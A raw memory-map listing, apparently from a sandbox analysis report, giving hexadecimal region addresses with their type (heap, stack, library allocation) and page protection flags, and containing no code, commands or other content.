7FF8388D0000
|
trusted library allocation
|
page read and write
|
||
|
CAC000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF838950000
|
trusted library allocation
|
page read and write
|
||
|
233ADB90000
|
heap
|
page read and write
|
||
|
8850000
|
trusted library allocation
|
page read and write
|
||
|
7B5A000
|
trusted library allocation
|
page read and write
|
||
|
55B9000
|
trusted library allocation
|
page read and write
|
||
|
289B42E0000
|
trusted library allocation
|
page read and write
|
||
|
6FA5CFF000
|
stack
|
page read and write
|
||
|
88F0000
|
trusted library allocation
|
page read and write
|
||
|
289B5C2B000
|
trusted library allocation
|
page read and write
|
||
|
7FF8389A0000
|
trusted library allocation
|
page read and write
|
||
|
7FF838A70000
|
trusted library allocation
|
page read and write
|
||
|
4DBF000
|
stack
|
page read and write
|
||
|
87E0000
|
heap
|
page read and write
|
||
|
6FA52FA000
|
stack
|
page read and write
|
||
|
4EFC000
|
stack
|
page read and write
|
||
|
233AF590000
|
heap
|
page execute and read and write
|
||
|
289B2B0E000
|
heap
|
page read and write
|
||
|
573D000
|
trusted library allocation
|
page read and write
|
||
|
7FF838743000
|
trusted library allocation
|
page read and write
|
||
|
DE2000
|
trusted library allocation
|
page execute and read and write
|
||
|
CA2000
|
trusted library allocation
|
page execute and read and write
|
||
|
289C4631000
|
trusted library allocation
|
page read and write
|
||
|
E3717FE000
|
stack
|
page read and write
|
||
|
897B000
|
heap
|
page read and write
|
||
|
7FF8388E5000
|
trusted library allocation
|
page read and write
|
||
|
28FE000
|
heap
|
page read and write
|
||
|
6FA54FE000
|
stack
|
page read and write
|
||
|
E96000
|
heap
|
page read and write
|
||
|
2D9C000
|
trusted library allocation
|
page read and write
|
||
|
289B5C23000
|
trusted library allocation
|
page read and write
|
||
|
6EC0000
|
heap
|
page execute and read and write
|
||
|
2D50000
|
trusted library allocation
|
page read and write
|
||
|
752A000
|
stack
|
page read and write
|
||
|
116F000
|
stack
|
page read and write
|
||
|
7FF838A50000
|
trusted library allocation
|
page read and write
|
||
|
2D4D000
|
trusted library allocation
|
page read and write
|
||
|
6FA5DFE000
|
stack
|
page read and write
|
||
|
324D000
|
heap
|
page read and write
|
||
|
2D4B000
|
trusted library allocation
|
page read and write
|
||
|
3430000
|
heap
|
page read and write
|
||
|
770000
|
heap
|
page read and write
|
||
|
7FF838970000
|
trusted library allocation
|
page read and write
|
||
|
670000
|
heap
|
page read and write
|
||
|
2A50000
|
heap
|
page read and write
|
||
|
289B629C000
|
trusted library allocation
|
page read and write
|
||
|
255DA1FD000
|
heap
|
page read and write
|
||
|
31CF000
|
unkown
|
page read and write
|
||
|
E3713D3000
|
stack
|
page read and write
|
||
|
E371A7E000
|
stack
|
page read and write
|
||
|
DBF000
|
stack
|
page read and write
|
||
|
270E000
|
stack
|
page read and write
|
||
|
6B8F000
|
stack
|
page read and write
|
||
|
73ED000
|
stack
|
page read and write
|
||
|
78B2000
|
heap
|
page read and write
|
||
|
E78000
|
heap
|
page read and write
|
||
|
46D5000
|
trusted library allocation
|
page execute and read and write
|
||
|
233ADC6C000
|
heap
|
page read and write
|
||
|
7FF8389B0000
|
trusted library allocation
|
page read and write
|
||
|
233AF5A1000
|
trusted library allocation
|
page read and write
|
||
|
46AD000
|
trusted library allocation
|
page execute and read and write
|
||
|
233ADC0F000
|
heap
|
page read and write
|
||
|
6FA57FF000
|
stack
|
page read and write
|
||
|
7C80000
|
trusted library allocation
|
page read and write
|
||
|
D93FCFA000
|
stack
|
page read and write
|
||
|
4FC000
|
stack
|
page read and write
|
||
|
289B4620000
|
heap
|
page execute and read and write
|
||
|
6DE000
|
stack
|
page read and write
|
||
|
CA0000
|
trusted library allocation
|
page read and write
|
||
|
19DE4590000
|
heap
|
page read and write
|
||
|
2BF6000
|
heap
|
page read and write
|
||
|
233ADD80000
|
heap
|
page read and write
|
||
|
289CCAE0000
|
heap
|
page read and write
|
||
|
560000
|
heap
|
page read and write
|
||
|
255DA232000
|
heap
|
page read and write
|
||
|
4D40000
|
heap
|
page read and write
|
||
|
289B2810000
|
heap
|
page read and write
|
||
|
7FF838732000
|
trusted library allocation
|
page read and write
|
||
|
6FA5AFE000
|
stack
|
page read and write
|
||
|
289B459B000
|
heap
|
page read and write
|
||
|
6ACD000
|
stack
|
page read and write
|
||
|
7C70000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF838734000
|
trusted library allocation
|
page read and write
|
||
|
46B9000
|
trusted library allocation
|
page read and write
|
||
|
680000
|
heap
|
page read and write
|
||
|
7130000
|
trusted library allocation
|
page read and write
|
||
|
6BDE000
|
stack
|
page read and write
|
||
|
106F000
|
stack
|
page read and write
|
||
|
289B44F0000
|
heap
|
page read and write
|
||
|
7D0000
|
heap
|
page read and write
|
||
|
7D00000
|
trusted library allocation
|
page read and write
|
||
|
495E000
|
stack
|
page read and write
|
||
|
7CC0000
|
trusted library allocation
|
page read and write
|
||
|
11B0000
|
heap
|
page execute and read and write
|
||
|
69AD000
|
stack
|
page read and write
|
||
|
5831000
|
trusted library allocation
|
page read and write
|
||
|
7FF8389C0000
|
trusted library allocation
|
page read and write
|
||
|
5A2C000
|
trusted library allocation
|
page read and write
|
||
|
7C2E000
|
stack
|
page read and write
|
||
|
6F71000
|
heap
|
page read and write
|
||
|
7FF83873D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF838732000
|
trusted library allocation
|
page read and write
|
||
|
3CF1000
|
trusted library allocation
|
page read and write
|
||
|
6C40000
|
heap
|
page read and write
|
||
|
233ADB70000
|
heap
|
page read and write
|
||
|
650000
|
heap
|
page read and write
|
||
|
67E000
|
unkown
|
page read and write
|
||
|
E371E3E000
|
stack
|
page read and write
|
||
|
C4E000
|
stack
|
page read and write
|
||
|
7290000
|
trusted library allocation
|
page read and write
|
||
|
72F0000
|
trusted library allocation
|
page read and write
|
||
|
7A48000
|
heap
|
page read and write
|
||
|
6ED0000
|
trusted library allocation
|
page read and write
|
||
|
8D00000
|
trusted library allocation
|
page read and write
|
||
|
29E5000
|
heap
|
page read and write
|
||
|
7E8C000
|
stack
|
page read and write
|
||
|
6FE8000
|
trusted library allocation
|
page read and write
|
||
|
4DFB000
|
stack
|
page read and write
|
||
|
3490000
|
heap
|
page read and write
|
||
|
7A4E000
|
heap
|
page read and write
|
||
|
480C000
|
stack
|
page read and write
|
||
|
289CCDBB000
|
heap
|
page read and write
|
||
|
7AFD000
|
trusted library allocation
|
page read and write
|
||
|
31E0000
|
heap
|
page read and write
|
||
|
C0E000
|
stack
|
page read and write
|
||
|
680000
|
heap
|
page read and write
|
||
|
7F52000
|
heap
|
page read and write
|
||
|
518D000
|
stack
|
page read and write
|
||
|
CB0000
|
heap
|
page read and write
|
||
|
BBF000
|
stack
|
page read and write
|
||
|
2D53000
|
trusted library allocation
|
page read and write
|
||
|
4710000
|
trusted library allocation
|
page execute and read and write
|
||
|
233AF629000
|
trusted library allocation
|
page read and write
|
||
|
47B8000
|
trusted library allocation
|
page read and write
|
||
|
255DA160000
|
heap
|
page read and write
|
||
|
2969000
|
heap
|
page read and write
|
||
|
491E000
|
stack
|
page read and write
|
||
|
7FF838A30000
|
trusted library allocation
|
page read and write
|
||
|
7A63000
|
heap
|
page read and write
|
||
|
7CE0000
|
trusted library allocation
|
page read and write
|
||
|
31E8000
|
heap
|
page read and write
|
||
|
7A96000
|
heap
|
page read and write
|
||
|
231B000
|
stack
|
page read and write
|
||
|
7A29000
|
heap
|
page read and write
|
||
|
7CF0000
|
trusted library allocation
|
page read and write
|
||
|
2B3B000
|
heap
|
page read and write
|
||
|
D9406FB000
|
stack
|
page read and write
|
||
|
4960000
|
heap
|
page read and write
|
||
|
289B28CD000
|
heap
|
page read and write
|
||
|
79E0000
|
heap
|
page read and write
|
||
|
7B50000
|
trusted library allocation
|
page read and write
|
||
|
2908000
|
heap
|
page read and write
|
||
|
7A33000
|
heap
|
page read and write
|
||
|
51CE000
|
stack
|
page read and write
|
||
|
68DE000
|
stack
|
page read and write
|
||
|
27AD000
|
stack
|
page read and write
|
||
|
32B5000
|
heap
|
page read and write
|
||
|
7110000
|
trusted library allocation
|
page read and write
|
||
|
46B0000
|
trusted library allocation
|
page read and write
|
||
|
D9405FE000
|
stack
|
page read and write
|
||
|
E371D3E000
|
stack
|
page read and write
|
||
|
6F96000
|
heap
|
page read and write
|
||
|
4D70000
|
trusted library allocation
|
page read and write
|
||
|
6FA53FE000
|
stack
|
page read and write
|
||
|
7A0000
|
trusted library allocation
|
page read and write
|
||
|
2359000
|
stack
|
page read and write
|
||
|
742B000
|
stack
|
page read and write
|
||
|
6EE8000
|
heap
|
page read and write
|
||
|
7E2E000
|
stack
|
page read and write
|
||
|
504D000
|
stack
|
page read and write
|
||
|
2870000
|
heap
|
page read and write
|
||
|
5780000
|
trusted library allocation
|
page read and write
|
||
|
27AE000
|
stack
|
page read and write
|
||
|
C9A000
|
trusted library allocation
|
page execute and read and write
|
||
|
E3719FE000
|
stack
|
page read and write
|
||
|
6870000
|
heap
|
page read and write
|
||
|
EFA963E000
|
stack
|
page read and write
|
||
|
6F2A000
|
heap
|
page read and write
|
||
|
233C7C60000
|
heap
|
page read and write
|
||
|
27C0000
|
heap
|
page read and write
|
||
|
7FF838920000
|
trusted library allocation
|
page execute and read and write
|
||
|
DEA000
|
trusted library allocation
|
page execute and read and write
|
||
|
4810000
|
trusted library allocation
|
page read and write
|
||
|
289B61A7000
|
trusted library allocation
|
page read and write
|
||
|
69C0000
|
heap
|
page execute and read and write
|
||
|
289CCAB7000
|
heap
|
page execute and read and write
|
||
|
289B2A60000
|
trusted library allocation
|
page read and write
|
||
|
2ADF000
|
unkown
|
page read and write
|
||
|
7FF8387E0000
|
trusted library allocation
|
page read and write
|
||
|
4C60000
|
trusted library allocation
|
page read and write
|
||
|
19DE4490000
|
heap
|
page read and write
|
||
|
746E000
|
stack
|
page read and write
|
||
|
7ECC000
|
stack
|
page read and write
|
||
|
6A70000
|
trusted library allocation
|
page execute and read and write
|
||
|
882E000
|
stack
|
page read and write
|
||
|
1380000
|
trusted library allocation
|
page execute and read and write
|
||
|
D9401FF000
|
stack
|
page read and write
|
||
|
233ADA90000
|
heap
|
page read and write
|
||
|
2EA0000
|
heap
|
page read and write
|
||
|
2D45000
|
trusted library allocation
|
page read and write
|
||
|
7F4D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
E50000
|
heap
|
page read and write
|
||
|
7BEF000
|
stack
|
page read and write
|
||
|
6E8E000
|
stack
|
page read and write
|
||
|
298D000
|
heap
|
page read and write
|
||
|
51AE000
|
stack
|
page read and write
|
||
|
6B0A000
|
stack
|
page read and write
|
||
|
7B60000
|
trusted library allocation
|
page read and write
|
||
|
7B57000
|
trusted library allocation
|
page read and write
|
||
|
27C8000
|
heap
|
page read and write
|
||
|
71CE000
|
stack
|
page read and write
|
||
|
4EED000
|
trusted library allocation
|
page read and write
|
||
|
4B0E000
|
stack
|
page read and write
|
||
|
2A6F000
|
unkown
|
page read and write
|
||
|
7A52000
|
heap
|
page read and write
|
||
|
7CA0000
|
trusted library allocation
|
page read and write
|
||
|
31D0000
|
heap
|
page read and write
|
||
|
EFA8FE5000
|
stack
|
page read and write
|
||
|
289B2A90000
|
heap
|
page readonly
|
||
|
E37197E000
|
stack
|
page read and write
|
||
|
6A0B000
|
stack
|
page read and write
|
||
|
2B4D000
|
stack
|
page read and write
|
||
|
289B4966000
|
trusted library allocation
|
page read and write
|
||
|
321B000
|
heap
|
page read and write
|
||
|
D93FEFE000
|
stack
|
page read and write
|
||
|
2415000
|
heap
|
page read and write
|
||
|
1FC000
|
stack
|
page read and write
|
||
|
7F50000
|
heap
|
page read and write
|
||
|
EFA937E000
|
stack
|
page read and write
|
||
|
4831000
|
trusted library allocation
|
page read and write
|
||
|
46CA000
|
trusted library allocation
|
page execute and read and write
|
||
|
289B2A80000
|
trusted library allocation
|
page read and write
|
||
|
E37288E000
|
stack
|
page read and write
|
||
|
2B6F000
|
stack
|
page read and write
|
||
|
233ADD95000
|
heap
|
page read and write
|
||
|
289B44E0000
|
heap
|
page read and write
|
||
|
AF9000
|
stack
|
page read and write
|
||
|
4DA7000
|
heap
|
page read and write
|
||
|
4720000
|
heap
|
page read and write
|
||
|
EFA947E000
|
stack
|
page read and write
|
||
|
7FF838A60000
|
trusted library allocation
|
page read and write
|
||
|
2420000
|
heap
|
page read and write
|
||
|
6FA5EFB000
|
stack
|
page read and write
|
||
|
6FA56FE000
|
stack
|
page read and write
|
||
|
2D40000
|
trusted library allocation
|
page read and write
|
||
|
289CCAB0000
|
heap
|
page execute and read and write
|
||
|
4C75000
|
trusted library allocation
|
page execute and read and write
|
||
|
6A60000
|
trusted library allocation
|
page read and write
|
||
|
E37173E000
|
stack
|
page read and write
|
||
|
72B0000
|
trusted library allocation
|
page read and write
|
||
|
E371EBC000
|
stack
|
page read and write
|
||
|
600000
|
heap
|
page read and write
|
||
|
2D20000
|
trusted library allocation
|
page read and write
|
||
|
289B5CF7000
|
trusted library allocation
|
page read and write
|
||
|
233ADD10000
|
trusted library allocation
|
page read and write
|
||
|
7FF838A90000
|
trusted library allocation
|
page read and write
|
||
|
EFA94FE000
|
stack
|
page read and write
|
||
|
280F000
|
stack
|
page read and write
|
||
|
289B2889000
|
heap
|
page read and write
|
||
|
E371C7E000
|
stack
|
page read and write
|
||
|
691E000
|
stack
|
page read and write
|
||
|
2906000
|
heap
|
page read and write
|
||
|
289B61D6000
|
trusted library allocation
|
page read and write
|
||
|
233C7B90000
|
heap
|
page read and write
|
||
|
295C000
|
heap
|
page read and write
|
||
|
7FF838816000
|
trusted library allocation
|
page execute and read and write
|
||
|
233ADD50000
|
heap
|
page readonly
|
||
|
233ADD40000
|
trusted library allocation
|
page read and write
|
||
|
2D5C000
|
trusted library allocation
|
page read and write
|
||
|
4841000
|
trusted library allocation
|
page read and write
|
||
|
530E000
|
stack
|
page read and write
|
||
|
2BF0000
|
heap
|
page read and write
|
||
|
6F94000
|
heap
|
page read and write
|
||
|
289B485D000
|
trusted library allocation
|
page read and write
|
||
|
EFA92FF000
|
stack
|
page read and write
|
||
|
CB5000
|
heap
|
page read and write
|
||
|
2B77000
|
heap
|
page read and write
|
||
|
19DE45D0000
|
heap
|
page read and write
|
||
|
6FDE000
|
heap
|
page read and write
|
||
|
51EE000
|
stack
|
page read and write
|
||
|
289B44F3000
|
heap
|
page read and write
|
||
|
7FF8387EC000
|
trusted library allocation
|
page execute and read and write
|
||
|
233C7B8B000
|
heap
|
page read and write
|
||
|
7FF838740000
|
trusted library allocation
|
page read and write
|
||
|
2D3F000
|
stack
|
page read and write
|
||
|
7C0000
|
heap
|
page read and write
|
||
|
7AE0000
|
trusted library allocation
|
page read and write
|
||
|
289C47D5000
|
trusted library allocation
|
page read and write
|
||
|
3242000
|
heap
|
page read and write
|
||
|
289CCAC0000
|
heap
|
page read and write
|
||
|
289E000
|
heap
|
page read and write
|
||
|
6F6D000
|
heap
|
page read and write
|
||
|
28F9000
|
heap
|
page read and write
|
||
|
308C000
|
stack
|
page read and write
|
||
|
7FF8387F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
79E000
|
stack
|
page read and write
|
||
|
7FF8387E6000
|
trusted library allocation
|
page read and write
|
||
|
6A10000
|
trusted library allocation
|
page read and write
|
||
|
7A9A000
|
heap
|
page read and write
|
||
|
8DEE000
|
stack
|
page read and write
|
||
|
C92000
|
trusted library allocation
|
page execute and read and write
|
||
|
6D9E000
|
stack
|
page read and write
|
||
|
7FF838930000
|
trusted library allocation
|
page read and write
|
||
|
289B4541000
|
heap
|
page read and write
|
||
|
690000
|
heap
|
page read and write
|
||
|
1390000
|
heap
|
page read and write
|
||
|
289B290A000
|
heap
|
page read and write
|
||
|
4DA0000
|
heap
|
page read and write
|
||
|
233C7B30000
|
heap
|
page execute and read and write
|
||
|
53F6000
|
trusted library allocation
|
page read and write
|
||
|
E371DBE000
|
stack
|
page read and write
|
||
|
276F000
|
stack
|
page read and write
|
||
|
287B000
|
heap
|
page read and write
|
||
|
2520000
|
trusted library allocation
|
page read and write
|
||
|
4D30000
|
trusted library allocation
|
page execute and read and write
|
||
|
6C1B000
|
stack
|
page read and write
|
||
|
720E000
|
stack
|
page read and write
|
||
|
7FF838850000
|
trusted library allocation
|
page execute and read and write
|
||
|
27EA000
|
stack
|
page read and write
|
||
|
7FF83878C000
|
trusted library allocation
|
page execute and read and write
|
||
|
289B2AA0000
|
trusted library allocation
|
page read and write
|
||
|
2D40000
|
heap
|
page read and write
|
||
|
289C4693000
|
trusted library allocation
|
page read and write
|
||
|
4CBE000
|
stack
|
page read and write
|
||
|
DFB000
|
trusted library allocation
|
page execute and read and write
|
||
|
47B0000
|
trusted library allocation
|
page read and write
|
||
|
46A4000
|
trusted library allocation
|
page read and write
|
||
|
2D9A000
|
trusted library allocation
|
page read and write
|
||
|
526E000
|
stack
|
page read and write
|
||
|
4F00000
|
heap
|
page read and write
|
||
|
289B45CE000
|
heap
|
page read and write
|
||
|
2D85000
|
trusted library allocation
|
page read and write
|
||
|
79C0000
|
trusted library allocation
|
page read and write
|
||
|
7F4E8000
|
trusted library allocation
|
page execute and read and write
|
||
|
6D5E000
|
stack
|
page read and write
|
||
|
289B27E0000
|
heap
|
page read and write
|
||
|
7AB3000
|
heap
|
page read and write
|
||
|
7D10000
|
trusted library allocation
|
page read and write
|
||
|
6FB0000
|
heap
|
page read and write
|
||
|
AFB000
|
stack
|
page read and write
|
||
|
72C0000
|
trusted library allocation
|
page read and write
|
||
|
233ADC21000
|
heap
|
page read and write
|
||
|
87DE000
|
stack
|
page read and write
|
||
|
233ADBE9000
|
heap
|
page read and write
|
||
|
233AF61E000
|
trusted library allocation
|
page read and write
|
||
|
28EE000
|
stack
|
page read and write
|
||
|
289B28C7000
|
heap
|
page read and write
|
||
|
7D9F000
|
stack
|
page read and write
|
||
|
7021000
|
heap
|
page read and write
|
||
|
7FF838912000
|
trusted library allocation
|
page read and write
|
||
|
2D7D000
|
trusted library allocation
|
page read and write
|
||
|
88C2000
|
trusted library allocation
|
page read and write
|
||
|
6FA59FD000
|
stack
|
page read and write
|
||
|
7FF8389D0000
|
trusted library allocation
|
page read and write
|
||
|
28FE000
|
heap
|
page read and write
|
||
|
7D30000
|
trusted library allocation
|
page read and write
|
||
|
7320000
|
trusted library allocation
|
page read and write
|
||
|
7FF83873D000
|
trusted library allocation
|
page execute and read and write
|
||
|
46A3000
|
trusted library allocation
|
page execute and read and write
|
||
|
735E000
|
stack
|
page read and write
|
||
|
731E000
|
stack
|
page read and write
|
||
|
7FF8388F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4C44000
|
trusted library allocation
|
page read and write
|
||
|
6F83000
|
heap
|
page read and write
|
||
|
62C9000
|
trusted library allocation
|
page read and write
|
||
|
289B455B000
|
heap
|
page read and write
|
||
|
7DA0000
|
heap
|
page read and write
|
||
|
46D2000
|
trusted library allocation
|
page read and write
|
||
|
289CCDCC000
|
heap
|
page read and write
|
||
|
75AB000
|
stack
|
page read and write
|
||
|
7300000
|
trusted library allocation
|
page read and write
|
||
|
E371BFD000
|
stack
|
page read and write
|
||
|
288E000
|
heap
|
page read and write
|
||
|
7FF8388E5000
|
trusted library allocation
|
page read and write
|
||
|
7FF838A80000
|
trusted library allocation
|
page read and write
|
||
|
255DA140000
|
heap
|
page read and write
|
||
|
29C000
|
stack
|
page read and write
|
||
|
3273000
|
heap
|
page read and write
|
||
|
72D0000
|
trusted library allocation
|
page read and write
|
||
|
E3716BF000
|
unkown
|
page read and write
|
||
|
8CFE000
|
stack
|
page read and write
|
||
|
62A1000
|
trusted library allocation
|
page read and write
|
||
|
233ADD90000
|
heap
|
page read and write
|
||
|
6438000
|
trusted library allocation
|
page read and write
|
||
|
255DA0F0000
|
heap
|
page read and write
|
||
|
7FF838A20000
|
trusted library allocation
|
page read and write
|
||
|
E3E000
|
stack
|
page read and write
|
||
|
233C7B40000
|
heap
|
page read and write
|
||
|
2CF1000
|
trusted library allocation
|
page read and write
|
||
|
7FF838850000
|
trusted library allocation
|
page execute and read and write
|
||
|
5290000
|
heap
|
page execute and read and write
|
||
|
289B62A0000
|
trusted library allocation
|
page read and write
|
||
|
4C40000
|
trusted library allocation
|
page read and write
|
||
|
D93FDFE000
|
stack
|
page read and write
|
||
|
1370000
|
trusted library allocation
|
page read and write
|
||
|
7CD0000
|
trusted library allocation
|
page read and write
|
||
|
8910000
|
heap
|
page read and write
|
||
|
3140000
|
heap
|
page read and write
|
||
|
2AE0000
|
heap
|
page read and write
|
||
|
2B30000
|
heap
|
page read and write
|
||
|
7120000
|
trusted library allocation
|
page read and write
|
||
|
5220000
|
heap
|
page execute and read and write
|
||
|
75C000
|
stack
|
page read and write
|
||
|
4D58000
|
trusted library allocation
|
page read and write
|
||
|
EFA96B8000
|
stack
|
page read and write
|
||
|
7B4E000
|
stack
|
page read and write
|
||
|
7FF838A40000
|
trusted library allocation
|
page read and write
|
||
|
74AE000
|
stack
|
page read and write
|
||
|
2908000
|
heap
|
page read and write
|
||
|
46F0000
|
trusted library allocation
|
page read and write
|
||
|
7BAE000
|
stack
|
page read and write
|
||
|
289B4390000
|
heap
|
page execute and read and write
|
||
|
4C6A000
|
trusted library allocation
|
page execute and read and write
|
||
|
233ADD26000
|
heap
|
page read and write
|
||
|
289CCDAB000
|
heap
|
page read and write
|
||
|
233BF5A1000
|
trusted library allocation
|
page read and write
|
||
|
516D000
|
stack
|
page read and write
|
||
|
289B43C0000
|
heap
|
page read and write
|
||
|
2726000
|
heap
|
page read and write
|
||
|
7630000
|
heap
|
page read and write
|
||
|
4700000
|
heap
|
page readonly
|
||
|
2AD0000
|
heap
|
page read and write
|
||
|
23D0000
|
heap
|
page read and write
|
||
|
289B28E1000
|
heap
|
page read and write
|
||
|
6FA6000
|
heap
|
page read and write
|
||
|
289B453F000
|
heap
|
page read and write
|
||
|
320C000
|
heap
|
page read and write
|
||
|
255DA1FF000
|
heap
|
page read and write
|
||
|
469F000
|
stack
|
page read and write
|
||
|
233ADD20000
|
heap
|
page read and write
|
||
|
E371AFF000
|
unkown
|
page read and write
|
||
|
79D0000
|
heap
|
page read and write
|
||
|
7FF838990000
|
trusted library allocation
|
page read and write
|
||
|
7310000
|
trusted library allocation
|
page read and write
|
||
|
7D50000
|
trusted library allocation
|
page read and write
|
||
|
47AE000
|
stack
|
page read and write
|
||
|
2B2E000
|
stack
|
page read and write
|
||
|
7340000
|
trusted library allocation
|
page read and write
|
||
|
EFA93FD000
|
stack
|
page read and write
|
||
|
7FF838AA0000
|
trusted library allocation
|
page read and write
|
||
|
5859000
|
trusted library allocation
|
page read and write
|
||
|
255DA0E0000
|
heap
|
page read and write
|
||
|
781E000
|
stack
|
page read and write
|
||
|
52CE000
|
stack
|
page read and write
|
||
|
79A0000
|
heap
|
page execute and read and write
|
||
|
D9403FD000
|
stack
|
page read and write
|
||
|
D9400FF000
|
stack
|
page read and write
|
||
|
728D000
|
stack
|
page read and write
|
||
|
75ED000
|
stack
|
page read and write
|
||
|
28F0000
|
heap
|
page read and write
|
||
|
AF6000
|
stack
|
page read and write
|
||
|
19DE4570000
|
heap
|
page read and write
|
||
|
CAA000
|
trusted library allocation
|
page execute and read and write
|
||
|
11AE000
|
stack
|
page read and write
|
||
|
7DF4D3750000
|
trusted library allocation
|
page execute and read and write
|
||
|
8900000
|
heap
|
page read and write
|
||
|
46D0000
|
trusted library allocation
|
page read and write
|
||
|
EB2000
|
heap
|
page read and write
|
||
|
233AF5B6000
|
trusted library allocation
|
page read and write
|
||
|
7FF8388E0000
|
trusted library allocation
|
page read and write
|
||
|
77DE000
|
stack
|
page read and write
|
||
|
69C5000
|
heap
|
page execute and read and write
|
||
|
289B2850000
|
heap
|
page read and write
|
||
|
289CCDC6000
|
heap
|
page read and write
|
||
|
7D30000
|
trusted library allocation
|
page execute and read and write
|
||
|
C70000
|
trusted library allocation
|
page read and write
|
||
|
4D20000
|
heap
|
page readonly
|
||
|
4893000
|
trusted library allocation
|
page read and write
|
||
|
E37167D000
|
stack
|
page read and write
|
||
|
724E000
|
stack
|
page read and write
|
||
|
2D58000
|
trusted library allocation
|
page read and write
|
||
|
7C6D000
|
stack
|
page read and write
|
||
|
8185000
|
trusted library allocation
|
page read and write
|
||
|
E7E000
|
heap
|
page read and write
|
||
|
4C50000
|
trusted library allocation
|
page read and write
|
||
|
7FF838750000
|
trusted library allocation
|
page read and write
|
||
|
6E4E000
|
stack
|
page read and write
|
||
|
33EE000
|
stack
|
page read and write
|
||
|
4F4E000
|
stack
|
page read and write
|
||
|
4C4D000
|
trusted library allocation
|
page execute and read and write
|
||
|
52A1000
|
trusted library allocation
|
page read and write
|
||
|
233ADC67000
|
heap
|
page read and write
|
||
|
7FF838733000
|
trusted library allocation
|
page execute and read and write
|
||
|
686E000
|
stack
|
page read and write
|
||
|
6FE0000
|
trusted library allocation
|
page read and write
|
||
|
64E000
|
stack
|
page read and write
|
||
|
7CB0000
|
trusted library allocation
|
page read and write
|
||
|
7A1F000
|
heap
|
page read and write
|
||
|
4EEB000
|
trusted library allocation
|
page read and write
|
||
|
7140000
|
trusted library allocation
|
page read and write
|
||
|
9C8000
|
heap
|
page read and write
|
||
|
762D000
|
stack
|
page read and write
|
||
|
2D3A000
|
trusted library allocation
|
page read and write
|
||
|
29C1000
|
heap
|
page read and write
|
||
|
6FF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
8C70000
|
trusted library allocation
|
page read and write
|
||
|
4CDE000
|
stack
|
page read and write
|
||
|
233BF5FC000
|
trusted library allocation
|
page read and write
|
||
|
DD0000
|
heap
|
page read and write
|
||
|
2B60000
|
trusted library allocation
|
page read and write
|
||
|
EFA957E000
|
stack
|
page read and write
|
||
|
233ADC1F000
|
heap
|
page read and write
|
||
|
643E000
|
trusted library allocation
|
page read and write
|
||
|
7FF8389E0000
|
trusted library allocation
|
page read and write
|
||
|
233ADC3F000
|
heap
|
page read and write
|
||
|
7FF838816000
|
trusted library allocation
|
page execute and read and write
|
||
|
7A88000
|
heap
|
page read and write
|
||
|
EFA973C000
|
stack
|
page read and write
|
||
|
879D000
|
stack
|
page read and write
|
||
|
62FC000
|
trusted library allocation
|
page read and write
|
||
|
235D000
|
stack
|
page read and write
|
||
|
4C43000
|
trusted library allocation
|
page execute and read and write
|
||
|
233AF5CB000
|
trusted library allocation
|
page read and write
|
||
|
5225000
|
heap
|
page execute and read and write
|
||
|
8B11000
|
trusted library allocation
|
page read and write
|
||
|
7FF8387F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF8387E0000
|
trusted library allocation
|
page read and write
|
||
|
2919000
|
heap
|
page read and write
|
||
|
7AA0000
|
heap
|
page read and write
|
||
|
EFA98BE000
|
stack
|
page read and write
|
||
|
7FF8389F0000
|
trusted library allocation
|
page read and write
|
||
|
289B28C0000
|
heap
|
page read and write
|
||
|
6A5E000
|
stack
|
page read and write
|
||
|
540E000
|
stack
|
page read and write
|
||
|
97F000
|
stack
|
page read and write
|
||
|
2D6B000
|
trusted library allocation
|
page read and write
|
||
|
EFA97BE000
|
stack
|
page read and write
|
||
|
3279000
|
heap
|
page read and write
|
||
|
4C90000
|
trusted library allocation
|
page read and write
|
||
|
9C0000
|
heap
|
page read and write
|
||
|
23C0000
|
heap
|
page read and write
|
||
|
2D5F000
|
trusted library allocation
|
page read and write
|
||
|
6EF6000
|
heap
|
page read and write
|
||
|
2908000
|
heap
|
page read and write
|
||
|
289B5366000
|
trusted library allocation
|
page read and write
|
||
|
289B2B00000
|
heap
|
page read and write
|
||
|
6427000
|
trusted library allocation
|
page read and write
|
||
|
289B2B05000
|
heap
|
page read and write
|
||
|
7FF838733000
|
trusted library allocation
|
page execute and read and write
|
||
|
6F4B000
|
heap
|
page read and write
|
||
|
289B43D1000
|
heap
|
page read and write
|
||
|
6EE0000
|
heap
|
page read and write
|
||
|
EFA983E000
|
stack
|
page read and write
|
||
|
7D40000
|
trusted library allocation
|
page read and write
|
||
|
5741000
|
trusted library allocation
|
page read and write
|
||
|
2D70000
|
trusted library allocation
|
page read and write
|
||
|
289B2908000
|
heap
|
page read and write
|
||
|
7FF838734000
|
trusted library allocation
|
page read and write
|
||
|
4C70000
|
trusted library allocation
|
page read and write
|
||
|
19DE4641000
|
heap
|
page read and write
|
||
|
6F7D000
|
heap
|
page read and write
|
||
|
EFA927E000
|
stack
|
page read and write
|
||
|
290C000
|
heap
|
page read and write
|
||
|
2720000
|
heap
|
page read and write
|
||
|
233AF5F7000
|
trusted library allocation
|
page read and write
|
||
|
6F9E000
|
heap
|
page read and write
|
||
|
695000
|
heap
|
page read and write
|
||
|
E371B7E000
|
stack
|
page read and write
|
||
|
E3718FE000
|
stack
|
page read and write
|
||
|
EFA95F9000
|
stack
|
page read and write
|
||
|
2ACE000
|
stack
|
page read and write
|
||
|
2840000
|
heap
|
page read and write
|
||
|
255DA110000
|
heap
|
page read and write
|
||
|
7B00000
|
trusted library allocation
|
page execute and read and write
|
||
|
4D1E000
|
stack
|
page read and write
|
||
|
7FF838A00000
|
trusted library allocation
|
page read and write
|
||
|
289C4640000
|
trusted library allocation
|
page read and write
|
||
|
289B46B5000
|
trusted library allocation
|
page read and write
|
||
|
3480000
|
trusted library allocation
|
page read and write
|
||
|
318E000
|
unkown
|
page read and write
|
||
|
46C0000
|
trusted library allocation
|
page read and write
|
||
|
6FA5BFE000
|
stack
|
page read and write
|
||
|
7F1E000
|
stack
|
page read and write
|
||
|
7FF83874B000
|
trusted library allocation
|
page read and write
|
||
|
6B4E000
|
stack
|
page read and write
|
||
|
D9404FE000
|
stack
|
page read and write
|
||
|
7FF8387EC000
|
trusted library allocation
|
page execute and read and write
|
||
|
